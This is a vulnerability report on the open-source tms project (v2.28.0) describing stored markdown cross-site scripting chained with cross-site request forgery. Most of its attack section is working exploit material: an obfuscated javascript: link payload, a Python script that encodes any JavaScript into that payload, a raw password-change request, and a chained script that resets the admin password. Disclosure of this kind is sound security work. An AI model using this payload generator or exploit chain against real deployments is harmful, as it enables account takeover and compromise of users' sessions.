There are cross site scripting vulnerabilities exist in tms

[WDLegend]

[Suggested description]
I found many cross site scripting(XSS) vulnerabilities exists in tms (markdown XSS). Every edit or comment page with markdown may has this vulnerability. It's too many to list.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/xiweicheng/tms

[Affected Product Code Base]
v2.28.0

[vulnerability proof]
Every markdown pages may has XSS. Here I choose this page:
http://localhost:8080/page/index.html#/chat/@super

Enter the poc here and send the message.

[click here](javascript:{onerror=eval}throw'=eval\x28String.fromCharCode\x2897,108,101,114,116,40,49,41\x29\x29')

The broswer alert 1

[Exploit scripts]:
code = """alert(1)""" # js code here
result = ''

ascii_values = [str(ord(char)) for char in code]

for value in ascii_values:
result += (value + ',')

result = result[:-1]
final = "[click here](javascript:{onerror=eval}throw'=" + f"eval\\x28String.fromCharCode\\x28{result}\\x29\\x29')"
print(final)

[Repair Suggestion]
Change another Markdown component, or add a filter in backend to check XSS attack when storing into MySQL.

[With CSRF vulnerability]
There is a CSRF vulnerability, we could use xss + csrf to change Admin's password.
This is the update password http package:

POST /admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 32
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: /
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/admin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1701849099; JSESSIONID=9F0DF9ABD117D0289143D1B75E19E15A; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1701867716
Connection: close

username=super&password=12345678

Exploit script here:

code = """var xhr = new XMLHttpRequest();
var url = 'http://localhost:8080/admin/user/update2';
xhr.onreadystatechange = function() {
if (xhr.readyState === XMLHttpRequest.DONE) {
if (xhr.status === 200) {
console.log('success!');
console.log(xhr.responseText);
} else {
console.error('failed' + xhr.status);
}
}
};
xhr.open('POST', url, true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
var postData = 'username=super&password=hacker123';
xhr.send(postData);""" # js code here
result = ''

ascii_values = [str(ord(char)) for char in code]

for value in ascii_values:
result += (value + ',')

result = result[:-1]
final = "[click here](javascript:{onerror=eval}throw'=" + f"eval\\x28String.fromCharCode\\x28{result}\\x29\\x29')"
print(final)

Send the message and open the console. Click the message.

Logout and relogin, the password has changed!